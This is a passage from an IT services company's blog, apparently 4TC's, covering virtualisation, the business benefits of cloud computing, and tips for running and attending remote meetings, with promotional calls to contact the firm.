This takes us back to a point we made at the start of our first article: remote working is made possible by the cloud and cloud storage. Both your office and remote teams have seamless access to all the data they need to fulfil their roles efficiently.

Virtualisation 

This is the process of creating a virtual representation, or virtual replica, of a physical resource, such as a server, storage device, or network. These are called virtual machines.  

Virtual machines behave like the physical resources they are based on, except that one physical machine can now run multiple operating systems and applications at once. Imagine a computer broken down into mini virtual versions of itself, which can also operate across multiple physical computers (or in this case, servers) at once. This unlocks a great deal of flexibility and scalability for businesses, as virtualisation enables hardware resources to be consolidated and optimised via cloud infrastructure.

For the final part of this article, we’ll highlight some of the benefits of using cloud technology in your business.  

The benefits of the Cloud to your Business 

Collaboration 

The cloud enables businesses to work flexibly, with remote working capabilities that allow teams to collaborate coherently and seamlessly across different locations and time zones. It has unlocked the ability for businesses to tap into talent across the globe and to form teams from a range of geographic locations.

Operationally, teams can work on documents in real time, see version histories (including who is responsible for changes), and communicate easily via calls, video chats and messaging. For developers and a business’s application infrastructure, the cloud provides more scalable capacity for developing, deploying and hosting apps.

In all, the cloud achieves the kind of collaboration that can be found in the office, with some additional benefits such as the potential for enhanced focus. That said, the cloud is not a guaranteed collaboration paradise; it takes an organised and responsible approach to get the best from cloud collaboration technology.

Backup and Business continuity 

As much as we try to avoid them, disasters do happen, and they can be business-defining. You need an efficient way of accessing all of your vital business data rapidly should the worst happen, and the cloud offers exactly that. The cloud allows you to continue with business as usual even in unusual circumstances. If a business experiences a disaster or emergency, such as a gas leak, flood, or fire, its teams can continue working from other locations with an internet connection, access the cloud, and resume operations.

Scalability 

A chief benefit of cloud computing is how flexible and scalable cloud solutions are, often with greater cost-efficiency as well. Whether a business hosts its applications or servers in the cloud, leverages SaaS solutions in its workflows, or uses VoIP technology, these can all be scaled easily and seamlessly to meet demand as the business grows or contracts.

Reduced cost  

Compared to traditional forms of IT, cloud computing requires far lower initial capital investment. Businesses using cloud solutions get much closer to paying only for what they use, as cloud resources are scalable, precise and flexible by nature. For businesses seeking more value at relatively lower cost, cloud technology is a great leverage point to invest in.

We Are 4TC Managed IT Services 

4TC can support you with all the services you need to run your business effectively, from email and domain hosting to fully managing your whole IT infrastructure. 

Setting up a great IT infrastructure is just the first step.  Keeping it up to date, safe and performing at its peak requires consistent attention. 

We can act as your IT department or supplement an existing one. We pride ourselves on developing long-term relationships that add value to your business, with high-quality managed support, expert strategic advice, and professional project management.

Tips to use for successful remote meetings 

Compared to in-person meetings, there are some additional factors to consider for your virtual meetings ahead of the call and in the meetings themselves. In this post, we provide tips for both hosts and participants about how to get the best from your remote meetings.   

Online meeting tips for meeting organisers 

Keep them structured 

Make sure an agenda is created and distributed in advance of the meeting, so that participants can give relevant feedback on it. Agendas are an important line of defence against digressions during remote meetings; with a concise list of discussion topics and action points you can keep discussions focused and on-topic. During the meeting, reiterate the agenda to reinforce alignment on the call, and allow some time to discuss and explore questions and answers so that unanticipated points can be navigated.

Plan ice breakers 

If your meeting involves engaging with strangers, organising an ice-breaker can be a great way to build rapport between participants: an activity that lets people open up a little during the call can set a relaxed atmosphere that is conducive to the meeting’s proceedings.

Appoint a lead or moderator 

Like the conductor of an orchestra, a meeting moderator or leader is a specific person who can direct the meeting in a harmonious and skilful way. A meeting leader can take charge of key tasks such as outlining the agenda, keeping discussions in line with the timetable, and ensuring the conversation remains on-topic.

Provide access links and invitations in advance 

Ensure that instructions to join the meeting are clear and easy to follow. For a more formal online meeting, issue calendar invitations to your team and create access links using your preferred conferencing platform. Make sure that everyone can access the platform before the call; it can also be helpful to send out reminders.

Assign roles 

If there are several presenters and themes, it is a good idea to assign jobs prior to a remote meeting. Who will take notes? Who oversees follow-up? Who is presenting which part? To avoid any hiccups, be sure that these questions are discussed and actioned beforehand.

Make sure your platform works properly before the call 

Before the call, test the platform with one or two people to make sure everything works. This is especially crucial when there are numerous callers, as unanticipated access issues can emerge in meetings.

Stick to a time limit 

Just because everyone is at home doesn’t mean they will all be available after the allotted time. Just as you would do for in-person meetings, observe the hard stop time for virtual meetings to keep them focused, productive, and seamless for yourself and attendees.  

Invite the right people

Keep meeting invitations to those for whom the meeting will be most relevant. Those who don’t take part in a call probably won’t need to be there later, but just in case, remember to take notes or record calls for reference, and to modify your invitation list as necessary.

After the meeting, share notes and to-dos

Remote meetings can be made more effective and lean by ensuring that actions and notes are well-defined, concise, and communicated to the team.

Organise a central database of knowledge

A central database of knowledge can make assimilating and organising meeting materials a cinch, and makes for a useful one-stop shop for accessing and communicating project information in an agile way.

Online meeting tips for attendees


The effectiveness of an online meeting depends on who participates. Attendees of remote meetings can use the following advice to make sure they are making effective use of their time and contributing appropriately to the meeting: 

Don’t multitask. 

Give the discussion your full attention. It is not just an act of courtesy; focused attention helps you absorb the meeting in full and get a feel for the subjects under discussion and the wider situation.

If you aren’t talking, put the microphone on mute. 

Whilst the sound of someone’s cat meowing in the background is a lovely thing, it also provokes comments like ‘what type of cat do you have, she’s lovely!’, and the discussion can end up veering off course thanks to these kinds of distractions. Take care to keep your mic muted when you are not speaking.

Turn your camera on. 

Face-to-face communication is a key aspect of building relationships and encouraging effective teamwork, and on a remote call this is possible in large part because of the camera. Ensure that it is switched on!

Make sure you have the right gear. 

To present yourself in the best possible way, invest in a high-quality webcam and microphone. The webcams and microphones that come with laptops and PCs are usually functional but not of the best quality, so this can be money well spent, especially if you work mostly remotely.

Prepare your workspace before the call. 

A clear, quiet setting will help you concentrate on the conversation. You can also prepare in other ways, such as having a notepad and pen to hand.

Keep your voice clear and slow. 

Video conferences are frequently interrupted by technical network glitches that can distort the sound and video quality of calls. If you talk slowly and deliberately, your voice will be heard and understood better.

Be thorough and descriptive. 

Remote calls come with the opportunities and limitations of screen sharing and audio. By being detail-conscious and aware of how your audience may be digesting what you’re presenting, you can tailor your communication to be clearer and more detailed, ensuring that everyone is on the same page in the discussion.

To illustrate your points, share your screen. 

If required, you can share information and documents on screen for more clarity. You’ll save time, and screen sharing helps both you and others learn more, more quickly.

Want to capitalise on the potential of your technology? Contact 4TC Today 

4TC take time to understand the daily challenges that your business faces. We then provide cost-effective tech solutions to these issues that will help you save time, protect vital data, and enable you and your staff to be more effective with your time management. Alongside our proactive IT support, we will ensure that your staff are using the technology at their disposal in a way that works for them, whilst making sure that they are educated on how to use it as productively as possible. The right Cloud solution has the power to revolutionise your business forever – utilising your IT to its full potential is essential to guaranteeing that you and your business can thrive and grow into the future. If you would like to find out more on how 4TC Services can provide affordable tech management for your business, drop us an email or call us now for a full demonstration.